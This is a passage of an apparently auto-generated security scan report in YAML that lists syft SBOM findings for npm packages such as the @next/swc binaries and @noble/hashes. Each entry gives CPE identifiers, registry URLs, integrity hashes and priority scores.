cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40next/swc-linux-arm64-gnu@14.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@next/swc-linux-arm64-gnu/-/swc-linux-arm64-gnu-14.2.3.tgz + integrity: sha512-cuzCE/1G0ZSnTAHJPUT1rPgQx1w5tzSX7POXSLaS7w2nIUJUD+e25QoXD/hMfxbsT9rslEXugWypJMILBj/QsA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 27ac7498beafdc1b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @next/swc-linux-arm64-musl 14.2.3' + title: '@next/swc-linux-arm64-musl 14.2.3' + description: 'Package discovered: @next/swc-linux-arm64-musl 14.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f485e6463dfab8af + name: '@next/swc-linux-arm64-musl' + version: 14.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@next\/swc-linux-arm64-musl:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux-arm64-musl:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux_arm64_musl:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux_arm64_musl:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40next/swc-linux-arm64-musl@14.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@next/swc-linux-arm64-musl/-/swc-linux-arm64-musl-14.2.3.tgz + integrity: sha512-0D4/oMM2Y9Ta3nGuCcQN8jjJjmDPYpHX9OJzqk42NZGJocU2MqhBq5tWkJrUQOQY9N+In9xOdymzapM09GeiZw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6ebdba72ca21b201 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @next/swc-linux-x64-gnu 14.2.3' + title: '@next/swc-linux-x64-gnu 14.2.3' + description: 'Package discovered: @next/swc-linux-x64-gnu 14.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 1a0b07449dd69139 + name: '@next/swc-linux-x64-gnu' + version: 14.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@next\/swc-linux-x64-gnu:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux-x64-gnu:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux_x64_gnu:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux_x64_gnu:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40next/swc-linux-x64-gnu@14.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@next/swc-linux-x64-gnu/-/swc-linux-x64-gnu-14.2.3.tgz + integrity: sha512-ENPiNnBNDInBLyUU5ii8PMQh+4XLr4pG51tOp6aJ9xqFQ2iRI6IH0Ds2yJkAzNV1CfyagcyzPfROMViS2wOZ9w== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: dc907ac1b205061b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @next/swc-linux-x64-musl 14.2.3' + title: '@next/swc-linux-x64-musl 14.2.3' + description: 'Package discovered: @next/swc-linux-x64-musl 14.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2ac68dfe221aa840 + name: '@next/swc-linux-x64-musl' + version: 14.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@next\/swc-linux-x64-musl:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux-x64-musl:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux_x64_musl:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux_x64_musl:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40next/swc-linux-x64-musl@14.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@next/swc-linux-x64-musl/-/swc-linux-x64-musl-14.2.3.tgz + integrity: sha512-BTAbq0LnCbF5MtoM7I/9UeUu/8ZBY0i8SFjUMCbPDOLv+un67e2JgyN4pmgfXBwy/I+RHu8q+k+MCkDN6P9ViQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1f0b6c5423b99cbb + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @next/swc-win32-arm64-msvc 14.2.3' + title: '@next/swc-win32-arm64-msvc 14.2.3' + description: 'Package discovered: @next/swc-win32-arm64-msvc 14.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f14dd9ed0ebaa5a4 + name: '@next/swc-win32-arm64-msvc' + version: 14.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@next\/swc-win32-arm64-msvc:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-win32-arm64-msvc:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32_arm64_msvc:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32_arm64_msvc:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-win32-arm64:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-win32-arm64:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32_arm64:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32_arm64:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40next/swc-win32-arm64-msvc@14.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@next/swc-win32-arm64-msvc/-/swc-win32-arm64-msvc-14.2.3.tgz + integrity: sha512-AEHIw/dhAMLNFJFJIJIyOFDzrzI5bAjI9J26gbO5xhAKHYTZ9Or04BesFPXiAYXDNdrwTP2dQceYA4dL1geu8A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: de3c183aece29806 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @next/swc-win32-ia32-msvc 14.2.3' + title: '@next/swc-win32-ia32-msvc 14.2.3' + description: 'Package discovered: @next/swc-win32-ia32-msvc 14.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0272e47fa12e3e5d + name: '@next/swc-win32-ia32-msvc' + version: 14.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@next\/swc-win32-ia32-msvc:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-win32-ia32-msvc:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32_ia32_msvc:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32_ia32_msvc:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-win32-ia32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-win32-ia32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32_ia32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32_ia32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40next/swc-win32-ia32-msvc@14.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@next/swc-win32-ia32-msvc/-/swc-win32-ia32-msvc-14.2.3.tgz + integrity: sha512-vga40n1q6aYb0CLrM+eEmisfKCR45ixQYXuBXxOOmmoV8sYST9k7E3US32FsY+CkkF7NtzdcebiFT4CHuMSyZw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 42051f1b01ab97d3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @next/swc-win32-x64-msvc 14.2.3' + title: '@next/swc-win32-x64-msvc 14.2.3' + description: 'Package discovered: @next/swc-win32-x64-msvc 14.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3812cfa26422b0fa + name: '@next/swc-win32-x64-msvc' + version: 14.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@next\/swc-win32-x64-msvc:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-win32-x64-msvc:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32_x64_msvc:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32_x64_msvc:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-win32-x64:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-win32-x64:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32_x64:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32_x64:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40next/swc-win32-x64-msvc@14.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@next/swc-win32-x64-msvc/-/swc-win32-x64-msvc-14.2.3.tgz + integrity: sha512-Q1/zm43RWynxrO7lW4ehciQVj+5ePBhOK+/K2P7pLFX3JaJ/IZVC69SHidrmZSOkqz7ECIOhhy7XhAFG4JYyHA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 22c53c131692682a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @noble/ciphers 1.3.0' + title: '@noble/ciphers 1.3.0' + description: 'Package discovered: @noble/ciphers 1.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e6d30724fc0ed7cf + name: '@noble/ciphers' + version: 1.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@noble\/ciphers:\@noble\/ciphers:1.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40noble/ciphers@1.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@noble/ciphers/-/ciphers-1.3.0.tgz + integrity: sha512-2I0gnIVPtfnMw9ee9h1dJG7tp81+8Ob3OJb3Mv37rx5L40/b0i7djjCVvGOVqc9AEIQyvyu1i6ypKdFw8R8gQw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d4d3b15cd9ed667f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @noble/hashes 1.8.0' + title: '@noble/hashes 1.8.0' + description: 'Package discovered: @noble/hashes 1.8.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 447b3d33bb79ef67 + name: '@noble/hashes' + version: 1.8.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@noble\/hashes:\@noble\/hashes:1.8.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40noble/hashes@1.8.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@noble/hashes/-/hashes-1.8.0.tgz + integrity: sha512-jCs9ldd7NwzpgXDIf6P3+NrHh9/sD6CQdxHyjQI+h/6rDNo88ypBxxz45UDuZHz9r3tNz7N/VInSVoVdtXEI4A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 137b4dda2faad400 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @nodable/entities 2.1.0' + title: '@nodable/entities 2.1.0' + description: 'Package discovered: @nodable/entities 2.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f8f74773abf739cd + name: '@nodable/entities' + version: 2.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@nodable\/entities:\@nodable\/entities:2.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40nodable/entities@2.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@nodable/entities/-/entities-2.1.0.tgz + integrity: sha512-nyT7T3nbMyBI/lvr6L5TyWbFJAI9FTgVRakNoBqCD+PmID8DzFrrNdLLtHMwMszOtqZa8PAOV24ZqDnQrhQINA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 43aa448b0b5207b8 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @nodelib/fs.scandir 2.1.5' + title: '@nodelib/fs.scandir 2.1.5' + description: 'Package discovered: @nodelib/fs.scandir 2.1.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 09afc93bd06904eb + name: '@nodelib/fs.scandir' + version: 2.1.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: 